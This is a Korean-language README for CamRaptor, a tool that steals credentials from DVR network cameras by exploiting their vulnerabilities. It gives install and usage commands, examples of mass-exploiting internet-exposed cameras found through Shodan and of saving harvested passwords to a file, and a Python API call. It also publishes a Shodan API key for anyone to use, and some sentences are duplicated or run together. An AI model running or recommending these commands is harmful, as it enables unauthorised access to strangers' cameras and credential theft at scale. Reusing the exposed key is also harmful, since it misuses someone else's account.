
CamRaptor는 인기 있는 DVR 카메라의 여러 취약점을 악용하여 네트워크 카메라 자격 증명을 획득하는 도구입니다.
CamRaptor는 인기 있는 DVR 카메라의 여러 취약점을 이용하여 네트워크 카메라 자격 증명을 획득하는 도구입니다.
Novo, CeNova, QSee와 같은 가장 인기 있는 카메라 모델의 취약점을 악용합니다.pip3 install git+https://github.com/EntySec/CamRaptor
CamRaptor를 사용하려면 터미널에 camraptor를 입력하세요.
usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
CamRaptor는 인기 있는 DVR 카메라의 여러 취약점을 이용하여 네트워크 카메라
자격 증명을 획득하는 도구입니다.
선택적 인수:
-h, --help 도움말 메시지를 표시하고 종료합니다.
-t, --threads 가장 빠른 작업을 위해 스레드를 사용합니다.
-o OUTPUT, --output OUTPUT
결과를 파일로 출력합니다.
-i INPUT, --input INPUT
주소 입력 파일입니다.
-a ADDRESS, --address ADDRESS
단일 주소입니다.
--shodan SHODAN 인터넷을 통해 장치를 악용하기 위한 Shodan API 키입니다.
--zoomeye ZOOMEYE 인터넷을 통해 장치를 악용하기 위한 ZoomEye API 키입니다.
-p PAGES, --pages PAGES
ZoomEye에서 가져올 페이지 수입니다.
단일 카메라 악용
재미삼아 내 카메라를 해킹해 봅시다.
camraptor -a 192.168.99.100
인터넷에서 카메라 악용
Shodan 검색 엔진을 사용하여 인터넷상의 카메라를 악용해 봅시다. 빠른 악용을 위해 -t를 함께 사용합니다.
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
참고: 제공된 Shodan API 키(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)는 제 프로 API 키입니다. 이 키나 자신의 키를 자유롭게 사용하세요. 모든 리소스를 무료로 사용할 수 있습니다 :)
입력 파일에서 카메라 악용
열린 카메라 데이터베이스를 사용하여 빠른 악용을 위해 -t를 함께 사용해 봅시다.
camraptor -t -i cameras.txt -o passwords.txt
참고: cameras.txt 목록에 있는 모든 카메라를 해당 주소로 악용하고 획득한 모든 비밀번호를 passwords.txt에 저장합니다.
CamRaptor는 자체 Python API도 제공하며, 코드에 CamRaptor를 임포트하여 호출할 수 있습니다.
from camraptor import CamRaptor
다음은 지정된 카메라를 악용하는 데 사용할 수 있는 모든 CamRaptor 기본 함수입니다.
exploit(address) - 지정된 주소의 단일 카메라를 악용합니다.단일 카메라 악용
from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)